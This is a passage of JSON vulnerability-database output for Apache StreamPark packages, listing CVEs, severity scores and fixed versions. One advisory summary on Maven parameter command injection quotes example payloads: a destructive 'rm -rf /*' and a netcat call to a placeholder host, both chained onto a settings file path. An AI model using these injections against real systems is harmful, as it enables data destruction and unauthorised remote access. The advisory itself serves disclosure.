ements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30867"},{"reference_url":"https://github.com/advisories/GHSA-rrcg-jwr5-32g7","reference_id":"GHSA-rrcg-jwr5-32g7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rrcg-jwr5-32g7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67020?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2
.1.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.2"},{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8bjy-8jm9-2bhu"},{"vulnerability":"VCID-9ssf-rvpt-suce"},{"vulnerability":"VCID-vpe1-chyd-q7cu"},{"vulnerability":"VCID-ztkm-usgz-hkdx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}],"aliases":["CVE-2023-30867","GHSA-rrcg-jwr5-32g7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pxce-7c8m-euce"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19092?format=json","vulnerability_id":"VCID-r8gn-a5tn-7bbq","summary":"Improper Neutralization of Special Elements used in a Command ('Command Injection')\nIn StreamPark, there is a project module that integrates Maven's compilation capability. However, the Maven compilation parameters are not checked, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the StreamPark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. 
Therefore, the risk level of this vulnerability is very low.\n\nMitigation:\n\nall users should upgrade to 2.1.2\n\nExample:\n\n##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use \"||\" or \"&&\":\n\n/usr/share/java/maven-3/conf/settings.xml || rm -rf /*\n\n/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-49898","reference_id":"","reference_type":"","scores":[{"value":"0.01896","scoring_system":"epss","scoring_elements":"0.83534","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-49898"},{"reference_url":"https://github.com/apache/incubator-streampark","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/incubator-streampark"},{"reference_url":"https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-49898","reference_id":"CVE-2023-49898","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-49898"},{"reference_url":"https://github.com/advisories/GHSA-qg44-xqwj-wc28","reference_id":"GHSA-qg44-xqwj-wc28","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qg44-xqwj-wc28"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67020?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.2","is_vulnerable":false,"affected_by_vulnerab
ilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.2"},{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8bjy-8jm9-2bhu"},{"vulnerability":"VCID-9ssf-rvpt-suce"},{"vulnerability":"VCID-vpe1-chyd-q7cu"},{"vulnerability":"VCID-ztkm-usgz-hkdx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}],"aliases":["CVE-2023-49898","GHSA-qg44-xqwj-wc28"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r8gn-a5tn-7bbq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/236448?format=json","vulnerability_id":"VCID-t8ws-6etb-ayhf","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-52291","reference_id":"","reference_type":"","scores":[{"value":"0.00397","scoring_system":"epss","scoring_elements":"0.60849","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-52291"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value
":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-22T15:31:24Z/"}],"url":"https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf"},{"reference_url":"http://www.openwall.com/lists/oss-security/2024/07/17/1","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-22T15:31:24Z/"}],"url":"http://www.openwall.com/lists/oss-security/2024/07/17/1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-52291","reference_id":"CVE-2023-52291","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-52291"},{"reference_url":"https://github.com/advisories/GHSA-7g94-hfqc-q993","reference_id":"GHSA-7g94-hfqc-q993","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7g94-hfqc-q993"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82188?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.4"},{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8bjy-8jm9-2bhu"},{"vulnerability":"VCID-
9ssf-rvpt-suce"},{"vulnerability":"VCID-vpe1-chyd-q7cu"},{"vulnerability":"VCID-ztkm-usgz-hkdx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}],"aliases":["CVE-2023-52291","GHSA-7g94-hfqc-q993"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t8ws-6etb-ayhf"}],"risk_score":"4.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}